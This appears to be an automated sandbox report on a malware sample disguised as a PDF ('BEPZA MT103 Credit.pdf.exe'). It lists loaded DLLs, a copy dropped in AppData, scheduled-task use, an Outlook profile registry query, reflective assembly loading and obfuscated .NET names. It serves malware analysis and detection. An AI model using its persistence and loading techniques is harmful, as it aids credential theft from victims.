Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: BEPZA MT103 Credit.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BEPZA MT103 Credit.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs .Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs .Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B6640 pushfd ; retf 0_2_077B6649
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B58F3 push eax; ret 0_2_077B5979
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55F48 pushfd ; iretd 0_2_07C55F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07486640 pushfd ; retf 11_2_07486649
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485970 pushad ; ret 11_2_07485971
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485973 push eax; ret 11_2_07485979
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885F48 pushfd ; iretd 11_2_07885F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126B3A8 push eax; iretd 16_2_0126B445
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126BB37 push es; iretd 16_2_0126BB44
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C09470 push es; ret 16_2_06C09480
Source: BEPZA MT103 Credit.pdf.exe Static PE information: section name: .text entropy: 7.64808870100143
Source: YEGIgzyAhkvT.exe.0.dr Static PE information: section name: .text entropy: 7.64808870100143
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, q3XwxeHE3wtcqHlLbH.cs High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, paZWfdzUnnsDNcXHe9.cs High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, WCNuVMYuSEVTHy8bH7.cs High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, y6b8FRlSR6PSYKhFPw.cs High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, QPUYnACfL7r4DkBL9YF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, nUBjUWrYcwnrjp5cwr.cs High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, gPDJgDfUH82JajhHPO.cs High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, wPcggfXarRGHwfdcKr.cs High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, HTZDqbGRORNdQopHe8.cs High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, hceRmTCWrN6wH7cI3N6.cs High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, uE5RalB2ln8b0n8Wbv.cs High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cvRFX3AvwS2op08hje.cs High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, OFmwd81ndwdfW0m9Y4.cs High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, mjcVcEUwoMYpYuk49f.cs High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, Cw8mvfWKUJllqoD5N5.cs High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, IeGoKjTYbK74xTl5pA.cs High entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, I7NNcAw8mv7vF81q9x.cs High entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, q3XwxeHE3wtcqHlLbH.cs High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, paZWfdzUnnsDNcXHe9.cs High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, WCNuVMYuSEVTHy8bH7.cs High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, y6b8FRlSR6PSYKhFPw.cs High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, QPUYnACfL7r4DkBL9YF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, nUBjUWrYcwnrjp5cwr.cs High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, gPDJgDfUH82JajhHPO.cs High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, wPcggfXarRGHwfdcKr.cs High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, HTZDqbGRORNdQopHe8.cs High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, hceRmTCWrN6wH7cI3N6.cs High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, uE5RalB2ln8b0n8Wbv.cs High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, cvRFX3AvwS2op08hje.cs High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, OFmwd81ndwdfW0m9Y4.cs High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, mjcVcEUwoMYpYuk49f.cs High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, Cw8mvfWKUJllqoD5N5.cs High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, IeGoKjTYbK74xTl5pA.cs High entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, I7NNcAw8mv7vF81q9x.cs High entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
